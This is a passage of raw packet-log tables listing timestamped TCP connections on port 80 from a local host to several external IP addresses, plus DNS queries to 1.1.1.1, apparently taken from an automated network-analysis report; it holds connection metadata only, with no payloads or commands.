Oct 22, 2024 05:38:54.670691967 CEST	49973	80	192.168.2.6	198.44.251.203
Oct 22, 2024 05:38:54.683263063 CEST	49973	80	192.168.2.6	198.44.251.203
Oct 22, 2024 05:38:54.689270973 CEST	80	49973	198.44.251.203	192.168.2.6
Oct 22, 2024 05:38:56.192176104 CEST	49973	80	192.168.2.6	198.44.251.203
Oct 22, 2024 05:38:56.239759922 CEST	80	49973	198.44.251.203	192.168.2.6
Oct 22, 2024 05:38:57.211994886 CEST	49974	80	192.168.2.6	198.44.251.203
Oct 22, 2024 05:38:57.217777014 CEST	80	49974	198.44.251.203	192.168.2.6
Oct 22, 2024 05:38:57.217984915 CEST	49974	80	192.168.2.6	198.44.251.203
Oct 22, 2024 05:38:57.229672909 CEST	49974	80	192.168.2.6	198.44.251.203
Oct 22, 2024 05:38:57.235193014 CEST	80	49974	198.44.251.203	192.168.2.6
Oct 22, 2024 05:38:57.235295057 CEST	80	49974	198.44.251.203	192.168.2.6
Oct 22, 2024 05:38:58.738914013 CEST	49974	80	192.168.2.6	198.44.251.203
Oct 22, 2024 05:38:58.787666082 CEST	80	49974	198.44.251.203	192.168.2.6
Oct 22, 2024 05:38:59.760632038 CEST	49975	80	192.168.2.6	198.44.251.203
Oct 22, 2024 05:38:59.766148090 CEST	80	49975	198.44.251.203	192.168.2.6
Oct 22, 2024 05:38:59.766237974 CEST	49975	80	192.168.2.6	198.44.251.203
Oct 22, 2024 05:38:59.776449919 CEST	49975	80	192.168.2.6	198.44.251.203
Oct 22, 2024 05:38:59.781830072 CEST	80	49975	198.44.251.203	192.168.2.6
Oct 22, 2024 05:39:00.625194073 CEST	80	49962	198.44.251.203	192.168.2.6
Oct 22, 2024 05:39:00.625447989 CEST	49962	80	192.168.2.6	198.44.251.203
Oct 22, 2024 05:39:03.151165009 CEST	80	49973	198.44.251.203	192.168.2.6
Oct 22, 2024 05:39:03.151360989 CEST	49973	80	192.168.2.6	198.44.251.203
Oct 22, 2024 05:39:05.701014042 CEST	80	49974	198.44.251.203	192.168.2.6
Oct 22, 2024 05:39:05.701092958 CEST	49974	80	192.168.2.6	198.44.251.203
Oct 22, 2024 05:39:08.254890919 CEST	80	49975	198.44.251.203	192.168.2.6
Oct 22, 2024 05:39:08.255197048 CEST	49975	80	192.168.2.6	198.44.251.203
Oct 22, 2024 05:39:08.255809069 CEST	49975	80	192.168.2.6	198.44.251.203
Oct 22, 2024 05:39:08.261265039 CEST	80	49975	198.44.251.203	192.168.2.6
Oct 22, 2024 05:39:13.357981920 CEST	49976	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:13.364008904 CEST	80	49976	81.2.196.19	192.168.2.6
Oct 22, 2024 05:39:13.364124060 CEST	49976	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:13.372646093 CEST	49976	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:13.378340006 CEST	80	49976	81.2.196.19	192.168.2.6
Oct 22, 2024 05:39:14.210371971 CEST	80	49976	81.2.196.19	192.168.2.6
Oct 22, 2024 05:39:14.254487038 CEST	49976	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:14.340817928 CEST	80	49976	81.2.196.19	192.168.2.6
Oct 22, 2024 05:39:14.340899944 CEST	49976	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:14.879626036 CEST	49976	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:15.898174047 CEST	49978	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:15.903757095 CEST	80	49978	81.2.196.19	192.168.2.6
Oct 22, 2024 05:39:15.903906107 CEST	49978	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:15.914376020 CEST	49978	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:15.919742107 CEST	80	49978	81.2.196.19	192.168.2.6
Oct 22, 2024 05:39:16.762723923 CEST	80	49978	81.2.196.19	192.168.2.6
Oct 22, 2024 05:39:16.817056894 CEST	49978	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:16.892155886 CEST	80	49978	81.2.196.19	192.168.2.6
Oct 22, 2024 05:39:16.892410994 CEST	49978	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:17.426440001 CEST	49978	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:18.444961071 CEST	49979	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:18.450922012 CEST	80	49979	81.2.196.19	192.168.2.6
Oct 22, 2024 05:39:18.451081991 CEST	49979	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:18.459836960 CEST	49979	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:18.466039896 CEST	80	49979	81.2.196.19	192.168.2.6
Oct 22, 2024 05:39:18.466156006 CEST	80	49979	81.2.196.19	192.168.2.6
Oct 22, 2024 05:39:19.312671900 CEST	80	49979	81.2.196.19	192.168.2.6
Oct 22, 2024 05:39:19.363997936 CEST	49979	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:19.441992998 CEST	80	49979	81.2.196.19	192.168.2.6
Oct 22, 2024 05:39:19.442154884 CEST	49979	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:19.973453045 CEST	49979	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:20.992018938 CEST	49980	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:20.997797966 CEST	80	49980	81.2.196.19	192.168.2.6
Oct 22, 2024 05:39:20.997888088 CEST	49980	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:21.003911972 CEST	49980	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:21.009531021 CEST	80	49980	81.2.196.19	192.168.2.6
Oct 22, 2024 05:39:21.844779015 CEST	80	49980	81.2.196.19	192.168.2.6
Oct 22, 2024 05:39:21.895108938 CEST	49980	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:21.974634886 CEST	80	49980	81.2.196.19	192.168.2.6
Oct 22, 2024 05:39:21.974756956 CEST	49980	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:21.975452900 CEST	49980	80	192.168.2.6	81.2.196.19
Oct 22, 2024 05:39:21.981477976 CEST	80	49980	81.2.196.19	192.168.2.6
Oct 22, 2024 05:39:27.080549955 CEST	49981	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:27.086245060 CEST	80	49981	195.110.124.133	192.168.2.6
Oct 22, 2024 05:39:27.086369038 CEST	49981	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:27.094897032 CEST	49981	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:27.100534916 CEST	80	49981	195.110.124.133	192.168.2.6
Oct 22, 2024 05:39:27.920222998 CEST	80	49981	195.110.124.133	192.168.2.6
Oct 22, 2024 05:39:27.973325968 CEST	49981	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:28.045315981 CEST	80	49981	195.110.124.133	192.168.2.6
Oct 22, 2024 05:39:28.045432091 CEST	49981	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:28.598309994 CEST	49981	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:29.617207050 CEST	49982	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:29.622945070 CEST	80	49982	195.110.124.133	192.168.2.6
Oct 22, 2024 05:39:29.623035908 CEST	49982	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:29.633151054 CEST	49982	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:29.639307022 CEST	80	49982	195.110.124.133	192.168.2.6
Oct 22, 2024 05:39:30.475660086 CEST	80	49982	195.110.124.133	192.168.2.6
Oct 22, 2024 05:39:30.523236036 CEST	49982	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:30.599206924 CEST	80	49982	195.110.124.133	192.168.2.6
Oct 22, 2024 05:39:30.603166103 CEST	49982	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:31.147289038 CEST	49982	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:32.163933992 CEST	49983	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:32.169539928 CEST	80	49983	195.110.124.133	192.168.2.6
Oct 22, 2024 05:39:32.169615030 CEST	49983	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:32.179908991 CEST	49983	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:32.185291052 CEST	80	49983	195.110.124.133	192.168.2.6
Oct 22, 2024 05:39:32.185394049 CEST	80	49983	195.110.124.133	192.168.2.6
Oct 22, 2024 05:39:33.014045000 CEST	80	49983	195.110.124.133	192.168.2.6
Oct 22, 2024 05:39:33.071126938 CEST	49983	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:33.138883114 CEST	80	49983	195.110.124.133	192.168.2.6
Oct 22, 2024 05:39:33.142359018 CEST	49983	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:33.692095995 CEST	49983	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:34.712376118 CEST	49984	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:34.718367100 CEST	80	49984	195.110.124.133	192.168.2.6
Oct 22, 2024 05:39:34.721201897 CEST	49984	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:34.726413965 CEST	49984	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:34.732012987 CEST	80	49984	195.110.124.133	192.168.2.6
Oct 22, 2024 05:39:35.570965052 CEST	80	49984	195.110.124.133	192.168.2.6
Oct 22, 2024 05:39:35.613850117 CEST	49984	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:35.695754051 CEST	80	49984	195.110.124.133	192.168.2.6
Oct 22, 2024 05:39:35.695862055 CEST	49984	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:35.697475910 CEST	49984	80	192.168.2.6	195.110.124.133
Oct 22, 2024 05:39:35.702805042 CEST	80	49984	195.110.124.133	192.168.2.6
Oct 22, 2024 05:39:41.065885067 CEST	49985	80	192.168.2.6	54.67.87.110
Oct 22, 2024 05:39:41.071330070 CEST	80	49985	54.67.87.110	192.168.2.6
Oct 22, 2024 05:39:41.071444035 CEST	49985	80	192.168.2.6	54.67.87.110
Oct 22, 2024 05:39:41.082259893 CEST	49985	80	192.168.2.6	54.67.87.110
Oct 22, 2024 05:39:41.088021040 CEST	80	49985	54.67.87.110	192.168.2.6
Oct 22, 2024 05:39:41.757124901 CEST	80	49985	54.67.87.110	192.168.2.6
Oct 22, 2024 05:39:41.797458887 CEST	80	49985	54.67.87.110	192.168.2.6
Oct 22, 2024 05:39:41.797522068 CEST	49985	80	192.168.2.6	54.67.87.110
Oct 22, 2024 05:39:42.584310055 CEST	49985	80	192.168.2.6	54.67.87.110
Oct 22, 2024 05:39:43.615199089 CEST	49986	80	192.168.2.6	54.67.87.110
Oct 22, 2024 05:39:43.620978117 CEST	80	49986	54.67.87.110	192.168.2.6
Oct 22, 2024 05:39:43.621061087 CEST	49986	80	192.168.2.6	54.67.87.110
Oct 22, 2024 05:39:43.633754969 CEST	49986	80	192.168.2.6	54.67.87.110
Oct 22, 2024 05:39:43.639374018 CEST	80	49986	54.67.87.110	192.168.2.6
Oct 22, 2024 05:39:44.289541960 CEST	80	49986	54.67.87.110	192.168.2.6
Oct 22, 2024 05:39:44.329334974 CEST	80	49986	54.67.87.110	192.168.2.6
Oct 22, 2024 05:39:44.329406977 CEST	49986	80	192.168.2.6	54.67.87.110
Oct 22, 2024 05:39:45.146912098 CEST	49986	80	192.168.2.6	54.67.87.110
Oct 22, 2024 05:39:46.163957119 CEST	49987	80	192.168.2.6	54.67.87.110
Oct 22, 2024 05:39:46.169539928 CEST	80	49987	54.67.87.110	192.168.2.6
Oct 22, 2024 05:39:46.169624090 CEST	49987	80	192.168.2.6	54.67.87.110
Oct 22, 2024 05:39:46.182544947 CEST	49987	80	192.168.2.6	54.67.87.110
Oct 22, 2024 05:39:46.188429117 CEST	80	49987	54.67.87.110	192.168.2.6
Oct 22, 2024 05:39:46.188471079 CEST	80	49987	54.67.87.110	192.168.2.6
Oct 22, 2024 05:39:46.844705105 CEST	80	49987	54.67.87.110	192.168.2.6
Oct 22, 2024 05:39:46.884521961 CEST	80	49987	54.67.87.110	192.168.2.6
Oct 22, 2024 05:39:46.886728048 CEST	49987	80	192.168.2.6	54.67.87.110
Oct 22, 2024 05:39:47.692356110 CEST	49987	80	192.168.2.6	54.67.87.110
Oct 22, 2024 05:39:48.718725920 CEST	49988	80	192.168.2.6	54.67.87.110
Oct 22, 2024 05:39:48.724684000 CEST	80	49988	54.67.87.110	192.168.2.6
Oct 22, 2024 05:39:48.728283882 CEST	49988	80	192.168.2.6	54.67.87.110
Oct 22, 2024 05:39:48.735362053 CEST	49988	80	192.168.2.6	54.67.87.110
Oct 22, 2024 05:39:48.740967989 CEST	80	49988	54.67.87.110	192.168.2.6
Oct 22, 2024 05:39:49.394701004 CEST	80	49988	54.67.87.110	192.168.2.6
Oct 22, 2024 05:39:49.435503960 CEST	80	49988	54.67.87.110	192.168.2.6
Oct 22, 2024 05:39:49.438369036 CEST	49988	80	192.168.2.6	54.67.87.110
Oct 22, 2024 05:39:49.439085007 CEST	49988	80	192.168.2.6	54.67.87.110
Oct 22, 2024 05:39:49.444466114 CEST	80	49988	54.67.87.110	192.168.2.6
Oct 22, 2024 05:39:59.530915022 CEST	49989	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:39:59.536444902 CEST	80	49989	199.59.243.227	192.168.2.6
Oct 22, 2024 05:39:59.536525011 CEST	49989	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:39:59.546803951 CEST	49989	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:39:59.552433968 CEST	80	49989	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:00.196727991 CEST	80	49989	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:00.197283030 CEST	80	49989	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:00.197345972 CEST	49989	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:00.229000092 CEST	80	49989	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:00.229188919 CEST	49989	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:01.052196026 CEST	49989	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:02.069989920 CEST	49990	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:02.075805902 CEST	80	49990	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:02.075891972 CEST	49990	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:02.088193893 CEST	49990	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:02.093981028 CEST	80	49990	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:02.733761072 CEST	80	49990	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:02.733792067 CEST	80	49990	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:02.733921051 CEST	49990	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:02.765773058 CEST	80	49990	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:02.765899897 CEST	49990	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:03.598341942 CEST	49990	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:04.619545937 CEST	49991	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:04.625293970 CEST	80	49991	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:04.628290892 CEST	49991	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:04.640197992 CEST	49991	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:04.645600080 CEST	80	49991	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:04.645626068 CEST	80	49991	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:05.254085064 CEST	80	49991	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:05.254111052 CEST	80	49991	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:05.254189014 CEST	80	49991	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:05.254324913 CEST	49991	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:06.145262003 CEST	49991	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:07.164208889 CEST	49992	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:07.169810057 CEST	80	49992	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:07.172386885 CEST	49992	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:07.178186893 CEST	49992	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:07.183804035 CEST	80	49992	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:07.806710958 CEST	80	49992	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:07.806770086 CEST	80	49992	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:07.806885004 CEST	49992	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:07.807046890 CEST	80	49992	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:07.807101965 CEST	49992	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:07.810399055 CEST	49992	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:07.815809011 CEST	80	49992	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:12.836519957 CEST	49993	80	192.168.2.6	162.213.249.216
Oct 22, 2024 05:40:12.842003107 CEST	80	49993	162.213.249.216	192.168.2.6
Oct 22, 2024 05:40:12.842092991 CEST	49993	80	192.168.2.6	162.213.249.216
Oct 22, 2024 05:40:12.850466967 CEST	49993	80	192.168.2.6	162.213.249.216
Oct 22, 2024 05:40:12.855803967 CEST	80	49993	162.213.249.216	192.168.2.6
Oct 22, 2024 05:40:13.554639101 CEST	80	49993	162.213.249.216	192.168.2.6
Oct 22, 2024 05:40:13.596024990 CEST	80	49993	162.213.249.216	192.168.2.6
Oct 22, 2024 05:40:13.596082926 CEST	49993	80	192.168.2.6	162.213.249.216
Oct 22, 2024 05:40:14.364065886 CEST	49993	80	192.168.2.6	162.213.249.216
Oct 22, 2024 05:40:15.383588076 CEST	49994	80	192.168.2.6	162.213.249.216
Oct 22, 2024 05:40:15.389295101 CEST	80	49994	162.213.249.216	192.168.2.6
Oct 22, 2024 05:40:15.396198988 CEST	49994	80	192.168.2.6	162.213.249.216
Oct 22, 2024 05:40:15.404201984 CEST	49994	80	192.168.2.6	162.213.249.216
Oct 22, 2024 05:40:15.409624100 CEST	80	49994	162.213.249.216	192.168.2.6
Oct 22, 2024 05:40:16.082892895 CEST	80	49994	162.213.249.216	192.168.2.6
Oct 22, 2024 05:40:16.121392012 CEST	80	49994	162.213.249.216	192.168.2.6
Oct 22, 2024 05:40:16.121449947 CEST	49994	80	192.168.2.6	162.213.249.216
Oct 22, 2024 05:40:16.910828114 CEST	49994	80	192.168.2.6	162.213.249.216
Oct 22, 2024 05:40:17.940768003 CEST	49995	80	192.168.2.6	162.213.249.216
Oct 22, 2024 05:40:17.946280003 CEST	80	49995	162.213.249.216	192.168.2.6
Oct 22, 2024 05:40:17.946345091 CEST	49995	80	192.168.2.6	162.213.249.216
Oct 22, 2024 05:40:17.958930016 CEST	49995	80	192.168.2.6	162.213.249.216
Oct 22, 2024 05:40:17.964216948 CEST	80	49995	162.213.249.216	192.168.2.6
Oct 22, 2024 05:40:17.964483976 CEST	80	49995	162.213.249.216	192.168.2.6
Oct 22, 2024 05:40:18.649277925 CEST	80	49995	162.213.249.216	192.168.2.6
Oct 22, 2024 05:40:18.687393904 CEST	80	49995	162.213.249.216	192.168.2.6
Oct 22, 2024 05:40:18.692223072 CEST	49995	80	192.168.2.6	162.213.249.216
Oct 22, 2024 05:40:19.474212885 CEST	49995	80	192.168.2.6	162.213.249.216
Oct 22, 2024 05:40:20.491976976 CEST	49996	80	192.168.2.6	162.213.249.216
Oct 22, 2024 05:40:20.497559071 CEST	80	49996	162.213.249.216	192.168.2.6
Oct 22, 2024 05:40:20.497658968 CEST	49996	80	192.168.2.6	162.213.249.216
Oct 22, 2024 05:40:20.504648924 CEST	49996	80	192.168.2.6	162.213.249.216
Oct 22, 2024 05:40:20.510031939 CEST	80	49996	162.213.249.216	192.168.2.6
Oct 22, 2024 05:40:21.178417921 CEST	80	49996	162.213.249.216	192.168.2.6
Oct 22, 2024 05:40:21.217744112 CEST	80	49996	162.213.249.216	192.168.2.6
Oct 22, 2024 05:40:21.217859030 CEST	49996	80	192.168.2.6	162.213.249.216
Oct 22, 2024 05:40:21.218801022 CEST	49996	80	192.168.2.6	162.213.249.216
Oct 22, 2024 05:40:21.226044893 CEST	80	49996	162.213.249.216	192.168.2.6
Oct 22, 2024 05:40:27.523672104 CEST	49997	80	192.168.2.6	221.121.144.149
Oct 22, 2024 05:40:27.529295921 CEST	80	49997	221.121.144.149	192.168.2.6
Oct 22, 2024 05:40:27.529349089 CEST	49997	80	192.168.2.6	221.121.144.149
Oct 22, 2024 05:40:27.542023897 CEST	49997	80	192.168.2.6	221.121.144.149
Oct 22, 2024 05:40:27.547564983 CEST	80	49997	221.121.144.149	192.168.2.6
Oct 22, 2024 05:40:29.051482916 CEST	49997	80	192.168.2.6	221.121.144.149
Oct 22, 2024 05:40:29.057749987 CEST	80	49997	221.121.144.149	192.168.2.6
Oct 22, 2024 05:40:29.058163881 CEST	49997	80	192.168.2.6	221.121.144.149
Oct 22, 2024 05:40:30.108992100 CEST	49998	80	192.168.2.6	221.121.144.149
Oct 22, 2024 05:40:30.115365982 CEST	80	49998	221.121.144.149	192.168.2.6
Oct 22, 2024 05:40:30.115447998 CEST	49998	80	192.168.2.6	221.121.144.149
Oct 22, 2024 05:40:30.132349014 CEST	49998	80	192.168.2.6	221.121.144.149
Oct 22, 2024 05:40:30.137624979 CEST	80	49998	221.121.144.149	192.168.2.6
Oct 22, 2024 05:40:31.645312071 CEST	49998	80	192.168.2.6	221.121.144.149
Oct 22, 2024 05:40:31.654077053 CEST	80	49998	221.121.144.149	192.168.2.6
Oct 22, 2024 05:40:31.654159069 CEST	49998	80	192.168.2.6	221.121.144.149
Oct 22, 2024 05:40:32.666014910 CEST	49999	80	192.168.2.6	221.121.144.149
Oct 22, 2024 05:40:32.672878981 CEST	80	49999	221.121.144.149	192.168.2.6
Oct 22, 2024 05:40:32.676531076 CEST	49999	80	192.168.2.6	221.121.144.149
Oct 22, 2024 05:40:32.685199022 CEST	49999	80	192.168.2.6	221.121.144.149
Oct 22, 2024 05:40:32.690726995 CEST	80	49999	221.121.144.149	192.168.2.6
Oct 22, 2024 05:40:32.690758944 CEST	80	49999	221.121.144.149	192.168.2.6
Oct 22, 2024 05:40:34.192089081 CEST	49999	80	192.168.2.6	221.121.144.149
Oct 22, 2024 05:40:34.198724985 CEST	80	49999	221.121.144.149	192.168.2.6
Oct 22, 2024 05:40:34.198786020 CEST	49999	80	192.168.2.6	221.121.144.149
Oct 22, 2024 05:40:35.211714029 CEST	50000	80	192.168.2.6	221.121.144.149
Oct 22, 2024 05:40:35.217286110 CEST	80	50000	221.121.144.149	192.168.2.6
Oct 22, 2024 05:40:35.223412991 CEST	50000	80	192.168.2.6	221.121.144.149
Oct 22, 2024 05:40:35.228218079 CEST	50000	80	192.168.2.6	221.121.144.149
Oct 22, 2024 05:40:35.233623028 CEST	80	50000	221.121.144.149	192.168.2.6
Oct 22, 2024 05:40:36.621258974 CEST	80	50000	221.121.144.149	192.168.2.6
Oct 22, 2024 05:40:36.679327011 CEST	50000	80	192.168.2.6	221.121.144.149
Oct 22, 2024 05:40:36.813617945 CEST	80	50000	221.121.144.149	192.168.2.6
Oct 22, 2024 05:40:36.814368963 CEST	50000	80	192.168.2.6	221.121.144.149
Oct 22, 2024 05:40:36.815361023 CEST	50000	80	192.168.2.6	221.121.144.149
Oct 22, 2024 05:40:36.820692062 CEST	80	50000	221.121.144.149	192.168.2.6
Oct 22, 2024 05:40:41.891699076 CEST	50001	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:41.897110939 CEST	80	50001	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:41.897182941 CEST	50001	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:41.909851074 CEST	50001	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:41.915226936 CEST	80	50001	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:42.522188902 CEST	80	50001	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:42.522268057 CEST	80	50001	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:42.522377014 CEST	50001	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:42.525343895 CEST	80	50001	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:42.525408983 CEST	50001	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:43.426513910 CEST	50001	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:44.448899031 CEST	50002	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:44.454848051 CEST	80	50002	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:44.454940081 CEST	50002	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:44.464335918 CEST	50002	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:44.469877958 CEST	80	50002	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:45.114386082 CEST	80	50002	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:45.114456892 CEST	80	50002	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:45.120243073 CEST	50002	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:45.146476984 CEST	80	50002	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:45.147664070 CEST	50002	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:45.973524094 CEST	50002	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:46.992299080 CEST	50003	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:46.998198032 CEST	80	50003	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:46.999330044 CEST	50003	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:47.007349014 CEST	50003	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:47.212471008 CEST	80	50003	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:47.213696957 CEST	80	50003	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:47.625760078 CEST	80	50003	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:47.625823021 CEST	80	50003	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:47.625864029 CEST	50003	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:47.625864983 CEST	80	50003	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:47.625919104 CEST	50003	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:48.520220041 CEST	50003	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:49.539351940 CEST	50004	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:49.545170069 CEST	80	50004	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:49.548331022 CEST	50004	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:49.554302931 CEST	50004	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:49.559715986 CEST	80	50004	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:50.204662085 CEST	80	50004	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:50.204727888 CEST	80	50004	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:50.204838037 CEST	50004	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:50.236541033 CEST	80	50004	199.59.243.227	192.168.2.6
Oct 22, 2024 05:40:50.236998081 CEST	50004	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:50.237590075 CEST	50004	80	192.168.2.6	199.59.243.227
Oct 22, 2024 05:40:50.242974997 CEST	80	50004	199.59.243.227	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 22, 2024 05:38:34.187200069 CEST	49496	53	192.168.2.6	1.1.1.1
Oct 22, 2024 05:38:34.413352966 CEST	53	49496	1.1.1.1	192.168.2.6
Oct 22, 2024 05:38:51.540106058 CEST	53011	53	192.168.2.6	1.1.1.1
Oct 22, 2024 05:38:52.124327898 CEST	53	53011	1.1.1.1	192.168.2.6
Oct 22, 2024 05:39:13.273544073 CEST	59470	53	192.168.2.6	1.1.1.1
Oct 22, 2024 05:39:13.355920076 CEST	53	59470	1.1.1.1	192.168.2.6
Oct 22, 2024 05:39:26.993957996 CEST	60608	53	192.168.2.6	1.1.1.1
Oct 22, 2024 05:39:27.077936888 CEST	53	60608	1.1.1.1	192.168.2.6
Oct 22, 2024 05:39:40.712183952 CEST	59414	53	192.168.2.6	1.1.1.1
Oct 22, 2024 05:39:41.063884974 CEST	53	59414	1.1.1.1	192.168.2.6
Oct 22, 2024 05:39:59.461600065 CEST	61205	53	192.168.2.6	1.1.1.1
Oct 22, 2024 05:39:59.528155088 CEST	53	61205	1.1.1.1	192.168.2.6
Oct 22, 2024 05:40:12.820202112 CEST	58102	53	192.168.2.6	1.1.1.1
Oct 22, 2024 05:40:12.834736109 CEST	53	58102	1.1.1.1	192.168.2.6
Oct 22, 2024 05:40:26.226530075 CEST	60482	53	192.168.2.6	1.1.1.1
Oct 22, 2024 05:40:27.224221945 CEST	60482	53	192.168.2.6	1.1.1.1
Oct 22, 2024 05:40:27.521277905 CEST	53	60482	1.1.1.1	192.168.2.6
